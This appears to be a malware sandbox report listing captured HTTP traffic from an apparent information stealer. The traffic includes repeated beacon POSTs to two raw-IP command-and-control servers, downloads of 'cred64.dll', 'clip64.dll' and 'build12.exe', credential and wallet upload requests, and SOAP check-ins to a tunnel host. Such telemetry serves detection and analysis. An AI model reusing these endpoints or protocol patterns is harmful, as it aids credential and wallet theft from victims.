                              Source: global trafficHTTP traffic detected: GET /enigma/Plugins/cred64.dll HTTP/1.1Host: 193.233.132.167
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: GET /lend/build12.exe HTTP/1.1Host: 193.233.132.167
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 31 38 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000187001&unit=246122658369
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: GET /lend/build12.exe HTTP/1.1Host: 193.233.132.167If-Modified-Since: Fri, 19 Apr 2024 00:20:52 GMTIf-None-Match: "6621b8e4-17e00"
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /enigma/Plugins/clip64.dll HTTP/1.1Host: 193.233.132.167
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-AliveData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnect xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 31 38 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000188001&unit=246122658369
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-AliveData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnect xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php?wal=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----NDYyMQ==Host: 193.233.132.167Content-Length: 4781Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
